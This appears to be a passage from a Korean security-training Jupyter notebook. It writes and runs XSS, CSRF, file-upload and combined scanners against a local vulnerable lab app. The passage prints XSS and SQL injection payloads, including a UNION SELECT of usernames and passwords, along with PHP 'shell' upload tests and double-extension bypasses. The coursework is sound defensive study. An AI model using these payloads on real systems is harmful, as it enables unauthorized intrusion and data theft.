    def test_board_xss(self):
        """게시판 XSS 테스트"""
        print("\n[*] Testing Board for XSS vulnerabilities...")
        
        for payload in self.payloads:
            try:
                # 게시글 작성
                data = {
                    'title': f'XSS Test: {payload[:30]}',
                    'content': payload
                }
                response = self.session.post(
                    f"{self.base_url}/board/write",
                    data=data,
                    allow_redirects=True,
                    timeout=10
                )
                
                # 게시판 확인
                board_response = self.session.get(f"{self.base_url}/board", timeout=10)
                
                # 페이로드가 그대로 HTML에 삽입되었는지 확인
                if payload in board_response.text:
                    self.vulnerabilities.append({
                        'type': 'Reflected XSS',
                        'location': '/board',
                        'payload': payload,
                        'severity': 'HIGH',
                        'description': f"XSS payload reflected in board: {payload}"
                    })
                    print(f"  [!] XSS VULNERABLE: {payload[:50]}")
                else:
                    print(f"  [-] Payload filtered: {payload[:50]}")
                    
            except Exception as e:
                print(f"  [-] Error testing payload: {str(e)}")
    
    def test_search_xss(self):
        """검색 기능 XSS 테스트"""
        print("\n[*] Testing Search for XSS vulnerabilities...")
        
        for payload in self.payloads:
            try:
                response = self.session.get(
                    f"{self.base_url}/search",
                    params={'q': payload},
                    timeout=10
                )
                
                # 페이로드가 반영되는지 확인
                if payload in response.text:
                    self.vulnerabilities.append({
                        'type': 'Reflected XSS',
                        'location': '/search',
                        'payload': payload,
                        'severity': 'MEDIUM',
                        'description': f"XSS payload reflected in search: {payload}"
                    })
                    print(f"  [!] XSS VULNERABLE: {payload[:50]}")
                    
            except Exception as e:
                print(f"  [-] Error: {str(e)}")
    
    def generate_report(self):
        """리포트 생성"""
        report = "\n" + "="*60 + "\n"
        report += "XSS SCAN REPORT\n"
        report += "="*60 + "\n"
        report += f"Scan Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
        report += f"Target: {self.base_url}\n"
        report += f"Total Vulnerabilities Found: {len(self.vulnerabilities)}\n"
        report += "="*60 + "\n\n"
        
        if self.vulnerabilities:
            for i, vuln in enumerate(self.vulnerabilities, 1):
                report += f"{i}. [{vuln['severity']}] {vuln['type']}\n"
                report += f"   Location: {vuln['location']}\n"
                report += f"   Payload: {vuln['payload']}\n"
                report += f"   Description: {vuln['description']}\n\n"
        else:
            report += "No XSS vulnerabilities found.\n"
        
        return report
    
    def scan(self):
        """전체 스캔 실행"""
        print(f"\n[*] Starting XSS Scan on {self.base_url}")
        print("="*60)
        
        if self.login():
            self.test_board_xss()
            self.test_search_xss()
        else:
            print("[!] Login failed. Cannot test authenticated features.")
        
        report = self.generate_report()
        print(report)
        
        # 리포트 파일 저장
        with open('../reports/xss_report.txt', 'w', encoding='utf-8') as f:
            f.write(report)
        
        print(f"[+] Report saved to: ../reports/xss_report.txt")
        
        return self.vulnerabilities

if __name__ == '__main__':
    scanner = XSSScanner('http://localhost:5000')
    scanner.scan()

Writing web_security_project/scanners/xss_scanner.py


In [26]:
%cd web_security_project/scanners
!python xss_scanner.py
%cd ../..

C:\Users\ghwns\HJ_git\SK_Shieldus_rookies_28\projects\week_9\web_security_project\vulnerable_app\web_security_project\scanners

[*] Starting XSS Scan on http://localhost:5000
[*] Logging in...
  [+] Login successful

[*] Testing Board for XSS vulnerabilities...
  [!] XSS VULNERABLE: <script>alert('XSS')</script>
  [!] XSS VULNERABLE: <img src=x onerror=alert('XSS')>
  [!] XSS VULNERABLE: <svg/onload=alert('XSS')>
  [!] XSS VULNERABLE: javascript:alert('XSS')
  [!] XSS VULNERABLE: <iframe src='javascript:alert("XSS")'></iframe>
  [!] XSS VULNERABLE: <body onload=alert('XSS')>

[*] Testing Search for XSS vulnerabilities...

XSS SCAN REPORT
Scan Date: 2025-12-28 14:14:06
Target: http://localhost:5000
Total Vulnerabilities Found: 6

1. [HIGH] Reflected XSS
   Location: /board
   Payload: <script>alert('XSS')</script>
   Description: XSS payload reflected in board: <script>alert('XSS')</script>

2. [HIGH] Reflected XSS
   Location: /board
   Payload: <img src=x onerror=alert('XSS')>
   Desc

### CSRF 스캐너

In [27]:
%%writefile web_security_project/scanners/csrf_scanner.py
import requests
from datetime import datetime
from bs4 import BeautifulSoup

class CSRFScanner:
    def __init__(self, base_url):
        self.base_url = base_url
        self.vulnerabilities = []
        self.session = requests.Session()
    
    def login(self):
        """로그인"""
        print("[*] Logging in...")
        data = {'username': 'admin', 'password': 'admin123'}
        response = self.session.post(f"{self.base_url}/login", data=data)
        if 'dashboard' in response.url or response.status_code == 302:
            print("  [+] Login successful")
            return True
        return False
    
    def check_csrf_token(self, url, form_data=None):
        """CSRF 토큰 존재 여부 확인"""
        try:
            response = self.session.get(url, timeout=10)
            soup = BeautifulSoup(response.text, 'html.parser')
            
            # 폼 찾기
            forms = soup.find_all('form')
            
            for form in forms:
                # CSRF 토큰 관련 input 필드 찾기
                csrf_inputs = form.find_all('input', {'name': lambda x: x and 'csrf' in x.lower()})
                
                if not csrf_inputs:
                    # 폼의 action 속성 확인
                    action = form.get('action', 'unknown')
                    method = form.get('method', 'GET').upper()
                    
                    if method == 'POST':
                        return False, action
            
            return True, None
            
        except Exception as e:
            print(f"  [-] Error checking CSRF token: {str(e)}")
            return None, None
    
    def test_profile_csrf(self):
        """프로필 수정 CSRF 테스트"""
        print("\n[*] Testing Profile Update for CSRF protection...")
        
        has_token, action = self.check_csrf_token(f"{self.base_url}/profile")
        
        if has_token is False:
            # CSRF 토큰 없이 요청 시도
            try:
                # 새로운 세션(공격자)으로 요청
                attacker_session = requests.Session()
                data = {'email': 'hacked@attacker.com'}
                
                # CSRF 공격 시뮬레이션 (쿠키 없이)
                response = attacker_session.post(
                    f"{self.base_url}/profile",
                    data=data,
                    timeout=10
                )
                
                self.vulnerabilities.append({
                    'type': 'CSRF (Cross-Site Request Forgery)',
                    'location': '/profile',
                    'severity': 'HIGH',
                    'description': 'No CSRF token found in profile update form. Vulnerable to CSRF attacks.'
                })
                print(f"  [!] CSRF VULNERABLE: No CSRF token in profile form")
                
            except Exception as e:
                print(f"  [-] Error: {str(e)}")
        else:
            print(f"  [+] CSRF token found - Protected")
    
    def test_post_creation_csrf(self):
        """게시글 작성 CSRF 테스트"""
        print("\n[*] Testing Post Creation for CSRF protection...")
        
        has_token, action = self.check_csrf_token(f"{self.base_url}/board/write")
        
        if has_token is False:
            self.vulnerabilities.append({
                'type': 'CSRF (Cross-Site Request Forgery)',
                'location': '/board/write',
                'severity': 'MEDIUM',
                'description': 'No CSRF token found in post creation form.'
            })
            print(f"  [!] CSRF VULNERABLE: No CSRF token in post creation form")
        else:
            print(f"  [+] CSRF token found - Protected")
    
    def generate_report(self):
        """리포트 생성"""
        report = "\n" + "="*60 + "\n"
        report += "CSRF SCAN REPORT\n"
        report += "="*60 + "\n"
        report += f"Scan Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
        report += f"Target: {self.base_url}\n"
        report += f"Total Vulnerabilities Found: {len(self.vulnerabilities)}\n"
        report += "="*60 + "\n\n"
        
        if self.vulnerabilities:
            for i, vuln in enumerate(self.vulnerabilities, 1):
                report += f"{i}. [{vuln['severity']}] {vuln['type']}\n"
                report += f"   Location: {vuln['location']}\n"
                report += f"   Description: {vuln['description']}\n\n"
        else:
            report += "No CSRF vulnerabilities found.\n"
        
        return report
    
    def scan(self):
        """전체 스캔 실행"""
        print(f"\n[*] Starting CSRF Scan on {self.base_url}")
        print("="*60)
        
        if self.login():
            self.test_profile_csrf()
            self.test_post_creation_csrf()
        else:
            print("[!] Login failed. Cannot test authenticated features.")
        
        report = self.generate_report()
        print(report)
        
        # 리포트 파일 저장
        with open('../reports/csrf_report.txt', 'w', encoding='utf-8') as f:
            f.write(report)
        
        print(f"[+] Report saved to: ../reports/csrf_report.txt")
        
        return self.vulnerabilities

if __name__ == '__main__':
    scanner = CSRFScanner('http://localhost:5000')
    scanner.scan()

Writing web_security_project/scanners/csrf_scanner.py


In [28]:
%cd web_security_project/scanners
!python csrf_scanner.py
%cd ../..

C:\Users\ghwns\HJ_git\SK_Shieldus_rookies_28\projects\week_9\web_security_project\vulnerable_app\web_security_project\scanners

[*] Starting CSRF Scan on http://localhost:5000
[*] Logging in...
  [+] Login successful

[*] Testing Profile Update for CSRF protection...
  [!] CSRF VULNERABLE: No CSRF token in profile form

[*] Testing Post Creation for CSRF protection...
  [!] CSRF VULNERABLE: No CSRF token in post creation form

CSRF SCAN REPORT
Scan Date: 2025-12-28 14:16:29
Target: http://localhost:5000
Total Vulnerabilities Found: 2

1. [HIGH] CSRF (Cross-Site Request Forgery)
   Location: /profile
   Description: No CSRF token found in profile update form. Vulnerable to CSRF attacks.

2. [MEDIUM] CSRF (Cross-Site Request Forgery)
   Location: /board/write
   Description: No CSRF token found in post creation form.


[+] Report saved to: ../reports/csrf_report.txt
C:\Users\ghwns\HJ_git\SK_Shieldus_rookies_28\projects\week_9\web_security_project\vulnerable_app


### File Upload 취약점 스캐너

In [30]:
%%writefile web_security_project/scanners/file_upload_scanner.py
import requests
from datetime import datetime
import os
import io

class FileUploadScanner:
    def __init__(self, base_url):
        self.base_url = base_url
        self.vulnerabilities = []
        self.session = requests.Session()
        
        # 위험한 파일 확장자 리스트
        self.dangerous_extensions = [
            'php', 'jsp', 'asp', 'aspx', 'exe', 'bat', 
            'sh', 'py', 'rb', 'pl', 'cgi'
        ]
    
    def login(self):
        """로그인"""
        print("[*] Logging in...")
        data = {'username': 'admin', 'password': 'admin123'}
        response = self.session.post(f"{self.base_url}/login", data=data)
        if 'dashboard' in response.url or response.status_code == 302:
            print("  [+] Login successful")
            return True
        return False
    
    def test_file_extension_bypass(self):
        """파일 확장자 검증 우회 테스트"""
        print("\n[*] Testing File Upload Extension Bypass...")
        
        for ext in self.dangerous_extensions:
            try:
                # 악성 파일 생성 (테스트용)
                file_content = b'<?php echo "Malicious Code"; ?>'
                filename = f'malicious.{ext}'
                
                files = {
                    'file': (filename, io.BytesIO(file_content), 'application/octet-stream')
                }
                
                response = self.session.post(
                    f"{self.base_url}/upload",
                    files=files,
                    timeout=10
                )
                
                # 업로드 성공 여부 확인
                if response.status_code == 200 and 'success' in response.text.lower():
                    self.vulnerabilities.append({
                        'type': 'File Upload Vulnerability',
                        'location': '/upload',
                        'extension': ext,
                        'severity': 'CRITICAL',
                        'description': f'Dangerous file extension allowed: .{ext}'
                    })
                    print(f"  [!] VULNERABLE: .{ext} file uploaded successfully")
                else:
                    print(f"  [-] Blocked: .{ext}")
                    
            except Exception as e:
                print(f"  [-] Error testing .{ext}: {str(e)}")
    
    def test_file_size_limit(self):
        """파일 크기 제한 테스트"""
        print("\n[*] Testing File Size Limits...")
        
        try:
            # 큰 파일 생성 (20MB)
            large_content = b'A' * (20 * 1024 * 1024)
            filename = 'large_file.txt'
            
            files = {
                'file': (filename, io.BytesIO(large_content), 'text/plain')
            }
            
            response = self.session.post(
                f"{self.base_url}/upload",
                files=files,
                timeout=30
            )
            
            if response.status_code == 200 and 'success' in response.text.lower():
                print(f"  [!] WARNING: Large file (20MB) accepted")
            else:
                print(f"  [+] File size limit enforced")
                
        except Exception as e:
            print(f"  [-] Error testing file size: {str(e)}")
    
    def test_double_extension(self):
        """이중 확장자 우회 테스트"""
        print("\n[*] Testing Double Extension Bypass...")
        
        test_files = [
            'malicious.php.jpg',
            'malicious.asp.png',
            'shell.php.txt',
        ]
        
        for filename in test_files:
            try:
                file_content = b'<?php echo "Test"; ?>'
                files = {
                    'file': (filename, io.BytesIO(file_content), 'image/jpeg')
                }
                
                response = self.session.post(
                    f"{self.base_url}/upload",
                    files=files,
                    timeout=10
                )
                
                if response.status_code == 200 and 'success' in response.text.lower():
                    self.vulnerabilities.append({
                        'type': 'File Upload Vulnerability (Double Extension)',
                        'location': '/upload',
                        'filename': filename,
                        'severity': 'HIGH',
                        'description': f'Double extension bypass possible: {filename}'
                    })
                    print(f"  [!] VULNERABLE: {filename} uploaded")
                else:
                    print(f"  [-] Blocked: {filename}")
                    
            except Exception as e:
                print(f"  [-] Error: {str(e)}")
    
    def generate_report(self):
        """리포트 생성"""
        report = "\n" + "="*60 + "\n"
        report += "FILE UPLOAD VULNERABILITY SCAN REPORT\n"
        report += "="*60 + "\n"
        report += f"Scan Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
        report += f"Target: {self.base_url}\n"
        report += f"Total Vulnerabilities Found: {len(self.vulnerabilities)}\n"
        report += "="*60 + "\n\n"
        
        if self.vulnerabilities:
            for i, vuln in enumerate(self.vulnerabilities, 1):
                report += f"{i}. [{vuln['severity']}] {vuln['type']}\n"
                report += f"   Location: {vuln['location']}\n"
                if 'extension' in vuln:
                    report += f"   Extension: .{vuln['extension']}\n"
                if 'filename' in vuln:
                    report += f"   Filename: {vuln['filename']}\n"
                report += f"   Description: {vuln['description']}\n\n"
        else:
            report += "No file upload vulnerabilities found.\n"
        
        return report
    
    def scan(self):
        """전체 스캔 실행"""
        print(f"\n[*] Starting File Upload Vulnerability Scan on {self.base_url}")
        print("="*60)
        
        if self.login():
            self.test_file_extension_bypass()
            self.test_double_extension()
            self.test_file_size_limit()
        else:
            print("[!] Login failed. Cannot test authenticated features.")
        
        report = self.generate_report()
        print(report)
        
        # 리포트 파일 저장
        with open('../reports/file_upload_report.txt', 'w', encoding='utf-8') as f:
            f.write(report)
        
        print(f"[+] Report saved to: ../reports/file_upload_report.txt")
        
        return self.vulnerabilities

if __name__ == '__main__':
    scanner = FileUploadScanner('http://localhost:5000')
    scanner.scan()

Overwriting web_security_project/scanners/file_upload_scanner.py


In [32]:
%cd web_security_project/scanners
!python file_upload_scanner.py
%cd ../..

C:\Users\ghwns\HJ_git\SK_Shieldus_rookies_28\projects\week_9\web_security_project\vulnerable_app\web_security_project\scanners

[*] Starting File Upload Vulnerability Scan on http://localhost:5000
[*] Logging in...
  [+] Login successful

[*] Testing File Upload Extension Bypass...
  [!] VULNERABLE: .php file uploaded successfully
  [!] VULNERABLE: .jsp file uploaded successfully
  [!] VULNERABLE: .asp file uploaded successfully
  [!] VULNERABLE: .aspx file uploaded successfully
  [!] VULNERABLE: .exe file uploaded successfully
  [!] VULNERABLE: .bat file uploaded successfully
  [!] VULNERABLE: .sh file uploaded successfully
  [!] VULNERABLE: .py file uploaded successfully
  [!] VULNERABLE: .rb file uploaded successfully
  [!] VULNERABLE: .pl file uploaded successfully
  [!] VULNERABLE: .cgi file uploaded successfully

[*] Testing Double Extension Bypass...
  [!] VULNERABLE: malicious.php.jpg uploaded
  [-] Error: HTTPConnectionPool(host='localhost', port=5000): Read timed out. (read t

### 통합 스캐너

In [33]:
%%writefile web_security_project/scanners/integrated_scanner.py
import requests
from datetime import datetime
import sys
import os

# 개별 스캐너 import
sys.path.append(os.path.dirname(__file__))
from sql_injection_scanner import SQLInjectionScanner
from xss_scanner import XSSScanner
from csrf_scanner import CSRFScanner
from file_upload_scanner import FileUploadScanner

class IntegratedScanner:
    def __init__(self, base_url):
        self.base_url = base_url
        self.all_vulnerabilities = []
        self.scan_results = {}
    
    def run_all_scans(self):
        """모든 스캐너 실행"""
        print("\n" + "="*70)
        print("INTEGRATED VULNERABILITY SCANNER")
        print("="*70)
        print(f"Target: {self.base_url}")
        print(f"Scan Started: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
        print("="*70 + "\n")
        
        # 1. SQL Injection Scan
        print("\n[1/4] Running SQL Injection Scanner...")
        print("-" * 70)
        sql_scanner = SQLInjectionScanner(self.base_url)
        sql_vulns = sql_scanner.scan()
        self.scan_results['SQL Injection'] = sql_vulns
        self.all_vulnerabilities.extend(sql_vulns)
        
        # 2. XSS Scan
        print("\n[2/4] Running XSS Scanner...")
        print("-" * 70)
        xss_scanner = XSSScanner(self.base_url)
        xss_vulns = xss_scanner.scan()
        self.scan_results['XSS'] = xss_vulns
        self.all_vulnerabilities.extend(xss_vulns)
        
        # 3. CSRF Scan
        print("\n[3/4] Running CSRF Scanner...")
        print("-" * 70)
        csrf_scanner = CSRFScanner(self.base_url)
        csrf_vulns = csrf_scanner.scan()
        self.scan_results['CSRF'] = csrf_vulns
        self.all_vulnerabilities.extend(csrf_vulns)
        
        # 4. File Upload Scan
        print("\n[4/4] Running File Upload Scanner...")
        print("-" * 70)
        upload_scanner = FileUploadScanner(self.base_url)
        upload_vulns = upload_scanner.scan()
        self.scan_results['File Upload'] = upload_vulns
        self.all_vulnerabilities.extend(upload_vulns)
    
    def generate_summary_report(self):
        """종합 리포트 생성"""
        report = "\n" + "="*70 + "\n"
        report += "COMPREHENSIVE SECURITY SCAN REPORT\n"
        report += "="*70 + "\n"
        report += f"Scan Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
        report += f"Target URL: {self.base_url}\n"
        report += "="*70 + "\n\n"
        
        # 취약점 요약
        report += "VULNERABILITY SUMMARY\n"
        report += "-" * 70 + "\n"
        report += f"Total Vulnerabilities Found: {len(self.all_vulnerabilities)}\n\n"
        
        for scan_type, vulns in self.scan_results.items():
            report += f"  - {scan_type}: {len(vulns)} vulnerabilities\n"
        
        report += "\n" + "="*70 + "\n\n"
        
        # 심각도별 분류
        critical = [v for v in self.all_vulnerabilities if v.get('severity') == 'CRITICAL']
        high = [v for v in self.all_vulnerabilities if v.get('severity') == 'HIGH']
        medium = [v for v in self.all_vulnerabilities if v.get('severity') == 'MEDIUM']
        
        report += "SEVERITY BREAKDOWN\n"
        report += "-" * 70 + "\n"
        report += f"  CRITICAL: {len(critical)}\n"
        report += f"  HIGH: {len(high)}\n"
        report += f"  MEDIUM: {len(medium)}\n"
        report += "\n" + "="*70 + "\n\n"
        
        # 상세 취약점 목록
        report += "DETAILED VULNERABILITY LIST\n"
        report += "="*70 + "\n\n"
        
        for i, vuln in enumerate(self.all_vulnerabilities, 1):
            report += f"{i}. [{vuln.get('severity', 'N/A')}] {vuln.get('type', 'Unknown')}\n"
            report += f"   Location: {vuln.get('location', 'N/A')}\n"
            if 'payload' in vuln:
                report += f"   Payload: {vuln['payload']}\n"
            if 'extension' in vuln:
                report += f"   Extension: .{vuln['extension']}\n"
            report += f"   Description: {vuln.get('description', 'N/A')}\n\n"
        
        # 권장 사항
        report += "="*70 + "\n"
        report += "SECURITY RECOMMENDATIONS\n"
        report += "="*70 + "\n\n"
        
        recommendations = [
            "1. SQL Injection Prevention:",
            "   - Use parameterized queries (prepared statements)",
            "   - Implement input validation and sanitization",
            "   - Use ORM frameworks with built-in protections\n",
            
            "2. XSS Prevention:",
            "   - Implement output encoding/escaping",
            "   - Use Content Security Policy (CSP)",
            "   - Validate and sanitize user inputs\n",
            
            "3. CSRF Prevention:",
            "   - Implement CSRF tokens for all state-changing operations",
            "   - Use SameSite cookie attribute",
            "   - Verify Origin and Referer headers\n",
            
            "4. File Upload Security:",
            "   - Validate file extensions (whitelist approach)",
            "   - Verify file content (magic bytes)",
            "   - Store uploaded files outside web root",
            "   - Implement file size limits",
            "   - Rename uploaded files\n"
        ]
        
        for rec in recommendations:
            report += rec + "\n"
        
        report += "\n" + "="*70 + "\n"
        report += "End of Report\n"
        report += "="*70 + "\n"
        
        return report
    
    def save_report(self):
        """리포트 저장"""
        report = self.generate_summary_report()
        
        # 콘솔 출력
        print(report)
        
        # 파일 저장
        timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
        filename = f'../reports/comprehensive_report_{timestamp}.txt'
        
        with open(filename, 'w', encoding='utf-8') as f:
            f.write(report)
        
        print(f"\n[+] Comprehensive report saved to: {filename}")
        
        return filename

if __name__ == '__main__':
    scanner = IntegratedScanner('http://localhost:5000')
    scanner.run_all_scans()
    scanner.save_report()

Writing web_security_project/scanners/integrated_scanner.py


In [45]:
%cd web_security_project/scanners
!python integrated_scanner.py
%cd ../..

C:\Users\ghwns\HJ_git\SK_Shieldus_rookies_28\projects\week_9\web_security_project\vulnerable_app\web_security_project\scanners

INTEGRATED VULNERABILITY SCANNER
Target: http://localhost:5000
Scan Started: 2025-12-28 14:39:26


[1/4] Running SQL Injection Scanner...
----------------------------------------------------------------------

[*] Starting SQL Injection Scan on http://localhost:5000

[*] Testing Login Form for SQL Injection...
  [!] VULNERABLE: ' OR '1'='1' --
  [!] VULNERABLE: ' OR '1'='1' /*
  [!] VULNERABLE: admin' --
  [!] SQL ERROR FOUND: SQLite
  [!] SQL ERROR FOUND: SQLite
  [!] SQL ERROR FOUND: SQLite

[*] Testing Search Function for SQL Injection...
  [!] VULNERABLE: admin' #
  [!] VULNERABLE: ' UNION SELECT NULL--
  [!] UNION INJECTION POSSIBLE: ' UNION SELECT NULL--
  [!] VULNERABLE: ' UNION SELECT username, password FROM users--
  [!] UNION INJECTION POSSIBLE: ' UNION SELECT username, password FROM users--

SQL INJECTION SCAN REPORT
Scan Date: 2025-12-28 14:39:59
T